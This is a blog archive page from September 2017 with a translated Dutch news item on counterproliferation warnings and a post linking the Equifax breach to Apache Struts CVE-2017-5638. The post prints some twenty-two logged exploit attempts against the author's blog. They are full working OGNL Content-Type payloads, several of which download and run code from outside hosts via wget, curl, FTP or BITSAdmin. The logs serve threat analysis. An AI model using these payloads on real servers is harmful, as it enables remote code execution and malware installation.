Month: September 2017

Chief of Dutch military intelligence warns Dutch companies and institutes to be aware of foreign nations’ attempts to acquire knowledge and materials used to develop WMDs

UPDATE 2017-10-25: answers (.pdf, in Dutch; mirror) to parliamentary questions on this matter.

NOS reports (in Dutch) on an interview by ANP where the chief of the Dutch Military Intelligence & Security Service (MIVD) warns companies and (knowledge) institutes to be aware of attempts by foreign nations including North Korea, Iran, Pakistan and Syria to acquire materials and knowledge in the Netherlands. Here is my translation of the NOS report:

The Dutch intelligence & security services annually thwarts “a substantial number of attempts” by foreign countries to acquire knowledge and materials for WMDs. That is what Onno Eichelsheim, chief of the Military Intelligence & Security Service (MIVD), states in an interview with the ANP.

Eichelsheim won’t say how frequently it happens. The reason for that is that he does not want to reveal the capabilities of the department that exclusively deals with that. The MIVD chief only notes that the Unit Counterproliferation employs dozens of personnel, and informs the ministry of defense dozens of times annually, for instance with regard to export licenses.

Eichelsheim states that companies and knowledge institutes are little aware that countries such as North Korea, Iran, Pakistan and Syria attempt to acquire knowledge in the Netherlands. The Netherlands is a technologically high-developed country, which those countries are eager to use.

Smaller companies who make products such as ball bearings or heat-resistant materials must also be alert, Eichelsheim says.

Countries that are seeking high-grade materials always use covers, such as a company or a middle person. Eichelsheim says it is certainly suspicious if a customer is willing to pay a high price for materials or chemicals that can be purchased elsewhere for a fraction of the price. Companies and institutes must be aware that their products can be used in the development of WMDs.

EOF

Equifax was compromised through Apache Struts (CVE-2017-5638); here are example attack attempts from my own logs

On 15 September 2017, Equifax stated their compromise happened through exploitation of a vulnerability in Apache Struts CVE-2017-5638 — published March 2017 when used in the wild — that involves a crafted Content-Type HTTP request header. For those interested, here are log rules of 28 (untargeted) requests that attempted to exploit this vulnerability on my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to right in the grey dialog below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and /bin/bash on non-Windows systems. 12 of 28 cases attempt to download & run code; the remaining 16 cases only execute echo “Struts2045” or echo “Amen4Wolves” and seem to be probes for vulnerability. In (only) one case I could still fetch the (presumably unfriendly) code: hxxp://82.165.129.119/UnInstall.exe, which one case attempted to download and feed to BITSAdmin.exe; I’ll take a look at that executable later.

blog.cyberwar.nl-forensic.log:+25030:58c2e12a:40|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/.jb %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/.jb ; fetch http%3a//65.254.63.20/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+18708:58ce3b02:5f|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+25980:58d00e81:14|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+5491:58d2431c:10|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c echo open 82.165.129.119 21 >> ik &echo user anonymous anonymous>> ik &echo binary >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s%3aik &del ik &1.exe &exit').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+5481:58d2431c:21|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/a%7csh ; rm -rf a ; curl -O http%3a//65.254.63.20/a ; sh a ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+4485:58d2431c:34|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='BITSAdmin.exe /Transfer JOB http%3a//82.165.129.119/UnInstall.exe %25TEMP%25/UnInstall.exe & %25TEMP%25/UnInstall.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+13314:58d45e97:54|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+4017:58ebf9b6:46|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14242:58f02f0c:f9|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+16047:58f02f12:9|GET /login/ HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+15024:58f02f14:b2|GET /wp-login.php HTTP/1.1|Accept-Encoding:identity|Host:blog.cyberwar.nl|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+6171:590e8bf2:64|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+21732:59233fb2:7|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 185.159.82.142/10 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+26909:5924b39c:2d|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14205:592ab9f1:d8|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15355:592ab9f1:16|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15448:592ab9f1:4|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+12791:59359766:28|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+23218:5940ef00:180|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+26725:5949c3cb:58|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+6599:597b4f8e:d9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+18295:597ef9c9:1e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
